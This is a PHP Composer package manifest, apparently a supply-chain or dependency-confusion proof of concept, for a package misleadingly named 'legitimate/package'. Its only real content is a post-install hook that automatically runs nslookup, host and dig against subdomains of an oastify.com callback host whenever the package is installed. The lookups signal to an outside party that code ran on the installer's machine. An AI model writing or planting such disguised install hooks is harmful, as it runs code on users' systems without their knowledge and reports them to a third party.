{
    "name": "legitimate/package",
    "require": {
        "php": ">=7.0"
    },
    "scripts": {
        "post-install-cmd": [
            "nslookup executed.3nr7po6eqvgm18c708ds4gzal1rsfj38.oastify.com",
            "host confirmed.3nr7po6eqvgm18c708ds4gzal1rsfj38.oastify.com",
            "dig success.3nr7po6eqvgm18c708ds4gzal1rsfj38.oastify.com"
        ]
    }
}
